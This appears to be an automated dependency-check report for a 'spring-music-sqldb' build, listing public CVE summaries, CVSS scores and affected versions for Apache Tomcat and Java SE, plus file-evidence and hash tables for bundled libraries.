CVE-2021-30640 suppress
A vulnerability in the JNDI Realm of Apache Tomcat allows an attacker to authenticate using variations of a valid user name and/or to bypass some of the protection provided by the LockOut Realm. This issue affects Apache Tomcat 10.0.0-M1 to 10.0.5; 9.0.0.M1 to 9.0.45; 8.5.0 to 8.5.65. CWE-116 Improper Encoding or Escaping of Output
CVSSv3:
Base Score: MEDIUM (6.5) Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:H/A:N/E:2.2/RC:R/MAV:A CVSSv2:
Base Score: MEDIUM (5.8) Vector: /AV:N/AC:M/Au:N/C:P/I:P/A:N References:
Vulnerable Software & Versions: (show all )
CVE-2024-23672 suppress
Denial of Service via incomplete cleanup vulnerability in Apache Tomcat. It was possible for WebSocket clients to keep WebSocket connections open leading to increased resource consumption.This issue affects Apache Tomcat: from 11.0.0-M1 through 11.0.0-M16, from 10.1.0-M1 through 10.1.18, from 9.0.0-M1 through 9.0.85, from 8.5.0 through 8.5.98.
Users are recommended to upgrade to version 11.0.0-M17, 10.1.19, 9.0.86 or 8.5.99 which fix the issue. CWE-459 Incomplete Cleanup
CVSSv3:
Base Score: MEDIUM (6.3) Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L/E:2.8/RC:R/MAV:A References:
Vulnerable Software & Versions: (show all )
CVE-2019-0221 suppress
The SSI printenv command in Apache Tomcat 9.0.0.M1 to 9.0.0.17, 8.5.0 to 8.5.39 and 7.0.0 to 7.0.93 echoes user provided data without escaping and is, therefore, vulnerable to XSS. SSI is disabled by default. The printenv command is intended for debugging and is unlikely to be present in a production website. CWE-79 Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
CVSSv3:
Base Score: MEDIUM (6.1) Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N/E:2.8/RC:R/MAV:A CVSSv2:
Base Score: MEDIUM (4.3) Vector: /AV:N/AC:M/Au:N/C:N/I:P/A:N References:
Vulnerable Software & Versions: (show all )
CVE-2023-41080 suppress
URL Redirection to Untrusted Site ('Open Redirect') vulnerability in FORM authentication feature Apache Tomcat.This issue affects Apache Tomcat: from 11.0.0-M1 through 11.0.0-M10, from 10.1.0-M1 through 10.0.12, from 9.0.0-M1 through 9.0.79 and from 8.5.0 through 8.5.92.
The vulnerability is limited to the ROOT (default) web application. CWE-601 URL Redirection to Untrusted Site ('Open Redirect')
CVSSv3:
Base Score: MEDIUM (6.1) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N/E:2.8/RC:R/MAV:A References:
Vulnerable Software & Versions: (show all )
CVE-2018-8037 suppress
If an async request was completed by the application at the same time as the container triggered the async timeout, a race condition existed that could result in a user seeing a response intended for a different user. An additional issue was present in the NIO and NIO2 connectors that did not correctly track the closure of the connection when an async request was completed by the application and timed out by the container at the same time. This could also result in a user seeing a response intended for another user. Versions Affected: Apache Tomcat 9.0.0.M9 to 9.0.9 and 8.5.5 to 8.5.31. CWE-362 Concurrent Execution using Shared Resource with Improper Synchronization ('Race Condition')
CVSSv3:
Base Score: MEDIUM (5.9) Vector: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N/E:2.2/RC:R/MAV:A CVSSv2:
Base Score: MEDIUM (4.3) Vector: /AV:N/AC:M/Au:N/C:P/I:N/A:N References:
af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,VENDOR_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,VENDOR_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY,VDB_ENTRY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY,VDB_ENTRY security@apache.org - MAILING_LIST,VENDOR_ADVISORY security@apache.org - MAILING_LIST,VENDOR_ADVISORY security@apache.org - PATCH,THIRD_PARTY_ADVISORY security@apache.org - THIRD_PARTY_ADVISORY security@apache.org - THIRD_PARTY_ADVISORY security@apache.org - THIRD_PARTY_ADVISORY security@apache.org - THIRD_PARTY_ADVISORY security@apache.org - THIRD_PARTY_ADVISORY,VDB_ENTRY security@apache.org - THIRD_PARTY_ADVISORY,VDB_ENTRY Vulnerable Software & Versions: (show all )
CVE-2019-2684 suppress
Vulnerability in the Java SE, Java SE Embedded component of Oracle Java SE (subcomponent: RMI). Supported versions that are affected are Java SE: 7u211, 8u202, 11.0.2 and 12; Java SE Embedded: 8u201. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE, Java SE Embedded. Successful attacks of this vulnerability can result in unauthorized creation, deletion or modification access to critical data or all Java SE, Java SE Embedded accessible data. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets (in Java SE 8), that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability can also be exploited by using APIs in the specified Component, e.g., through a web service which supplies data to the APIs. CVSS 3.0 Base Score 5.9 (Integrity impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:N). NVD-CWE-noinfo
CVSSv3:
Base Score: MEDIUM (5.9) Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:N/E:2.2/RC:R/MAV:A CVSSv2:
Base Score: MEDIUM (4.3) Vector: /AV:N/AC:M/Au:N/C:N/I:P/A:N References:
af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,VENDOR_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY secalert_us@oracle.com - MAILING_LIST,THIRD_PARTY_ADVISORY secalert_us@oracle.com - MAILING_LIST,THIRD_PARTY_ADVISORY secalert_us@oracle.com - MAILING_LIST,THIRD_PARTY_ADVISORY secalert_us@oracle.com - MAILING_LIST,THIRD_PARTY_ADVISORY secalert_us@oracle.com - MAILING_LIST,THIRD_PARTY_ADVISORY secalert_us@oracle.com - MAILING_LIST,THIRD_PARTY_ADVISORY secalert_us@oracle.com - PATCH,VENDOR_ADVISORY secalert_us@oracle.com - THIRD_PARTY_ADVISORY secalert_us@oracle.com - THIRD_PARTY_ADVISORY secalert_us@oracle.com - THIRD_PARTY_ADVISORY secalert_us@oracle.com - THIRD_PARTY_ADVISORY secalert_us@oracle.com - THIRD_PARTY_ADVISORY secalert_us@oracle.com - THIRD_PARTY_ADVISORY secalert_us@oracle.com - THIRD_PARTY_ADVISORY secalert_us@oracle.com - THIRD_PARTY_ADVISORY secalert_us@oracle.com - THIRD_PARTY_ADVISORY secalert_us@oracle.com - THIRD_PARTY_ADVISORY secalert_us@oracle.com - THIRD_PARTY_ADVISORY secalert_us@oracle.com - THIRD_PARTY_ADVISORY secalert_us@oracle.com - THIRD_PARTY_ADVISORY secalert_us@oracle.com - THIRD_PARTY_ADVISORY Vulnerable Software & Versions: (show all )
CVE-2021-24122 suppress
When serving resources from a network location using the NTFS file system, Apache Tomcat versions 10.0.0-M1 to 10.0.0-M9, 9.0.0.M1 to 9.0.39, 8.5.0 to 8.5.59 and 7.0.0 to 7.0.106 were susceptible to JSP source code disclosure in some configurations. The root cause was the unexpected behaviour of the JRE API File.getCanonicalPath() which in turn was caused by the inconsistent behaviour of the Windows API (FindFirstFileW) in some circumstances. CWE-706 Use of Incorrectly-Resolved Name or Reference, CWE-200 Exposure of Sensitive Information to an Unauthorized Actor
CVSSv3:
Base Score: MEDIUM (5.9) Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N/E:2.2/RC:R/MAV:A CVSSv2:
Base Score: MEDIUM (4.3) Vector: /AV:N/AC:M/Au:N/C:P/I:N/A:N References:
Vulnerable Software & Versions: (show all )
CVE-2021-33037 suppress
Apache Tomcat 10.0.0-M1 to 10.0.6, 9.0.0.M1 to 9.0.46 and 8.5.0 to 8.5.66 did not correctly parse the HTTP transfer-encoding request header in some circumstances leading to the possibility to request smuggling when used with a reverse proxy. Specifically: - Tomcat incorrectly ignored the transfer encoding header if the client declared it would only accept an HTTP/1.0 response; - Tomcat honoured the identify encoding; and - Tomcat did not ensure that, if present, the chunked encoding was the final encoding. CWE-444 Inconsistent Interpretation of HTTP Requests ('HTTP Request/Response Smuggling')
CVSSv3:
Base Score: MEDIUM (5.3) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N/E:3.9/RC:R/MAV:A CVSSv2:
Base Score: MEDIUM (5.0) Vector: /AV:N/AC:L/Au:N/C:N/I:P/A:N References:
af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,VENDOR_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY security@apache.org - MAILING_LIST,THIRD_PARTY_ADVISORY security@apache.org - MAILING_LIST,VENDOR_ADVISORY security@apache.org - PATCH,THIRD_PARTY_ADVISORY security@apache.org - PATCH,THIRD_PARTY_ADVISORY security@apache.org - PATCH,THIRD_PARTY_ADVISORY security@apache.org - PATCH,THIRD_PARTY_ADVISORY security@apache.org - THIRD_PARTY_ADVISORY security@apache.org - THIRD_PARTY_ADVISORY security@apache.org - THIRD_PARTY_ADVISORY security@apache.org - THIRD_PARTY_ADVISORY Vulnerable Software & Versions: (show all )
CVE-2023-42795 suppress
Incomplete Cleanup vulnerability in Apache Tomcat.When recycling various internal objects in Apache Tomcat from 11.0.0-M1 through 11.0.0-M11, from 10.1.0-M1 through 10.1.13, from 9.0.0-M1 through 9.0.80 and from 8.5.0 through 8.5.93, an error could
cause Tomcat to skip some parts of the recycling process leading to
information leaking from the current request/response to the next.
Users are recommended to upgrade to version 11.0.0-M12 onwards, 10.1.14 onwards, 9.0.81 onwards or 8.5.94 onwards, which fixes the issue. CWE-459 Incomplete Cleanup
CVSSv3:
Base Score: MEDIUM (5.3) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N/E:3.9/RC:R/MAV:A References:
Vulnerable Software & Versions: (show all )
CVE-2023-45648 suppress
Improper Input Validation vulnerability in Apache Tomcat.Tomcat from 11.0.0-M1 through 11.0.0-M11, from 10.1.0-M1 through 10.1.13, from 9.0.0-M1 through 9.0.81 and from 8.5.0 through 8.5.93 did not correctly parse HTTP trailer headers. A specially
crafted, invalid trailer header could cause Tomcat to treat a single
request as multiple requests leading to the possibility of request
smuggling when behind a reverse proxy.
Users are recommended to upgrade to version 11.0.0-M12 onwards, 10.1.14 onwards, 9.0.81 onwards or 8.5.94 onwards, which fix the issue. CWE-20 Improper Input Validation, NVD-CWE-Other
CVSSv3:
Base Score: MEDIUM (5.3) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N/E:3.9/RC:R/MAV:A References:
Vulnerable Software & Versions: (show all )
CVE-2024-21733 suppress
Generation of Error Message Containing Sensitive Information vulnerability in Apache Tomcat.This issue affects Apache Tomcat: from 8.5.7 through 8.5.63, from 9.0.0-M11 through 9.0.43.
Users are recommended to upgrade to version 8.5.64 onwards or 9.0.44 onwards, which contain a fix for the issue. CWE-209 Generation of Error Message Containing Sensitive Information
CVSSv3:
Base Score: MEDIUM (5.3) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N/E:3.9/RC:R/MAV:A References:
Vulnerable Software & Versions: (show all )
CVE-2020-1935 suppress
In Apache Tomcat 9.0.0.M1 to 9.0.30, 8.5.0 to 8.5.50 and 7.0.0 to 7.0.99 the HTTP header parsing code used an approach to end-of-line parsing that allowed some invalid HTTP headers to be parsed as valid. This led to a possibility of HTTP Request Smuggling if Tomcat was located behind a reverse proxy that incorrectly handled the invalid Transfer-Encoding header in a particular manner. Such a reverse proxy is considered unlikely. CWE-444 Inconsistent Interpretation of HTTP Requests ('HTTP Request/Response Smuggling')
CVSSv3:
Base Score: MEDIUM (4.8) Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N/E:2.2/RC:R/MAV:A CVSSv2:
Base Score: MEDIUM (5.8) Vector: /AV:N/AC:M/Au:N/C:P/I:P/A:N References:
af854a3a-2127-422b-91ae-364da2661108 - BROKEN_LINK,MAILING_LIST,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,VENDOR_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY security@apache.org - BROKEN_LINK,MAILING_LIST,THIRD_PARTY_ADVISORY security@apache.org - MAILING_LIST,THIRD_PARTY_ADVISORY security@apache.org - MAILING_LIST,THIRD_PARTY_ADVISORY security@apache.org - MAILING_LIST,VENDOR_ADVISORY security@apache.org - THIRD_PARTY_ADVISORY security@apache.org - THIRD_PARTY_ADVISORY security@apache.org - THIRD_PARTY_ADVISORY security@apache.org - THIRD_PARTY_ADVISORY security@apache.org - THIRD_PARTY_ADVISORY security@apache.org - THIRD_PARTY_ADVISORY security@apache.org - THIRD_PARTY_ADVISORY Vulnerable Software & Versions: (show all )
CVE-2018-11784 suppress
When the default servlet in Apache Tomcat versions 9.0.0.M1 to 9.0.11, 8.5.0 to 8.5.33 and 7.0.23 to 7.0.90 returned a redirect to a directory (e.g. redirecting to '/foo/' when the user requested '/foo') a specially crafted URL could be used to cause the redirect to be generated to any URI of the attackers choice. CWE-601 URL Redirection to Untrusted Site ('Open Redirect')
CVSSv3:
Base Score: MEDIUM (4.3) Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N/E:2.8/RC:R/MAV:A CVSSv2:
Base Score: MEDIUM (4.3) Vector: /AV:N/AC:M/Au:N/C:N/I:P/A:N References:
Vulnerable Software & Versions: (show all )
CVE-2020-13943 suppress
If an HTTP/2 client connecting to Apache Tomcat 10.0.0-M1 to 10.0.0-M7, 9.0.0.M1 to 9.0.37 or 8.5.0 to 8.5.57 exceeded the agreed maximum number of concurrent streams for a connection (in violation of the HTTP/2 protocol), it was possible that a subsequent request made on that connection could contain HTTP headers - including HTTP/2 pseudo headers - from a previous request rather than the intended headers. This could lead to users seeing responses for unexpected resources. NVD-CWE-noinfo
CVSSv3:
Base Score: MEDIUM (4.3) Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N/E:2.8/RC:R/MAV:A CVSSv2:
Base Score: MEDIUM (4.0) Vector: /AV:N/AC:L/Au:S/C:P/I:N/A:N References:
Vulnerable Software & Versions: (show all )
CVE-2023-28708 suppress
When using the RemoteIpFilter with requests received from a reverse proxy via HTTP that include the X-Forwarded-Proto header set to https, session cookies created by Apache Tomcat 11.0.0-M1 to 11.0.0.-M2, 10.1.0-M1 to 10.1.5, 9.0.0-M1 to 9.0.71 and 8.5.0 to 8.5.85 did not include the secure attribute. This could result in the user agent transmitting the session cookie over an insecure channel.
CWE-523 Unprotected Transport of Credentials
CVSSv3:
Base Score: MEDIUM (4.3) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N/E:2.8/RC:R/MAV:A References:
Vulnerable Software & Versions: (show all )
CVE-2021-43980 suppress
The simplified implementation of blocking reads and writes introduced in Tomcat 10 and back-ported to Tomcat 9.0.47 onwards exposed a long standing (but extremely hard to trigger) concurrency bug in Apache Tomcat 10.1.0 to 10.1.0-M12, 10.0.0-M1 to 10.0.18, 9.0.0-M1 to 9.0.60 and 8.5.0 to 8.5.77 that could cause client connections to share an Http11Processor instance resulting in responses, or part responses, to be received by the wrong client. CWE-362 Concurrent Execution using Shared Resource with Improper Synchronization ('Race Condition')
CVSSv3:
Base Score: LOW (3.7) Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N/E:2.2/RC:R/MAV:A References:
Vulnerable Software & Versions: (show all )
spring-music-sqldb-1.0.jar: validation-api-2.0.1.Final.jarDescription:
Bean Validation API
License:
Apache License 2.0: http://www.apache.org/licenses/LICENSE-2.0.txt File Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/validation-api-2.0.1.Final.jar
MD5: 5d02c034034a7a16725ceff787e191d6
SHA1: cb855558e6271b1b32e716d24cb85c7f583ce09e
SHA256: 9873b46df1833c9ee8f5bc1ff6853375115dadd8897bcb5a0dffb5848835ee6c
Evidence Type Source Name Value Confidence Vendor file name validation-api High Vendor jar package name javax Highest Vendor jar package name validation Highest Vendor Manifest automatic-module-name java.validation Medium Vendor Manifest bundle-symbolicname javax.validation.api Medium Vendor pom artifactid validation-api Low Vendor pom developer email emmanuel@hibernate.org Low Vendor pom developer email guillaume.smet@hibernate.org Low Vendor pom developer email gunnar@hibernate.org Low Vendor pom developer email hferents@redhat.com Low Vendor pom developer id emmanuelbernard Medium Vendor pom developer id epbernard Medium Vendor pom developer id guillaume.smet Medium Vendor pom developer id gunnar.morling Medium Vendor pom developer id hardy.ferentschik Medium Vendor pom developer name Emmanuel Bernard Medium Vendor pom developer name Guillaume Smet Medium Vendor pom developer name Gunnar Morling Medium Vendor pom developer name Hardy Ferentschik Medium Vendor pom developer org Red Hat, Inc. Medium Vendor pom groupid javax.validation Highest Vendor pom name Bean Validation API High Vendor pom url http://beanvalidation.org Highest Product file name validation-api High Product jar package name javax Highest Product jar package name validation Highest Product Manifest automatic-module-name java.validation Medium Product Manifest Bundle-Name Bean Validation API Medium Product Manifest bundle-symbolicname javax.validation.api Medium Product pom artifactid validation-api Highest Product pom developer email emmanuel@hibernate.org Low Product pom developer email guillaume.smet@hibernate.org Low Product pom developer email gunnar@hibernate.org Low Product pom developer email hferents@redhat.com Low Product pom developer id emmanuelbernard Low Product pom developer id epbernard Low Product pom developer id guillaume.smet Low Product pom developer id gunnar.morling Low Product pom developer id hardy.ferentschik Low Product pom developer name Emmanuel Bernard Low Product pom developer name Guillaume Smet Low Product pom developer name Gunnar Morling Low Product pom developer name Hardy Ferentschik Low Product pom developer org Red Hat, Inc. Low Product pom groupid javax.validation Highest Product pom name Bean Validation API High Product pom url http://beanvalidation.org Medium Version Manifest Bundle-Version 2.0.1.Final High Version pom version 2.0.1.Final Highest
status.jsFile Path: /github/workspace/build/resources/main/static/js/status.jsMD5: 17aeb2e23abc1780d646852db444ad85SHA1: 9f5f323d09a60d84488bd1416bba51f8898df834SHA256: 52f6b0bd287c53317bcd4b5315c8d506c37617b5db27c7fdc124c1b24fc1adf1
Evidence Type Source Name Value Confidence
Related Dependencies spring-music-sqldb-1.0.jar: status.jsFile Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/classes/static/js/status.js MD5: 17aeb2e23abc1780d646852db444ad85 SHA1: 9f5f323d09a60d84488bd1416bba51f8898df834 SHA256: 52f6b0bd287c53317bcd4b5315c8d506c37617b5db27c7fdc124c1b24fc1adf1 status.jsFile Path: /github/workspace/src/main/resources/static/js/status.js MD5: 17aeb2e23abc1780d646852db444ad85 SHA1: 9f5f323d09a60d84488bd1416bba51f8898df834 SHA256: 52f6b0bd287c53317bcd4b5315c8d506c37617b5db27c7fdc124c1b24fc1adf1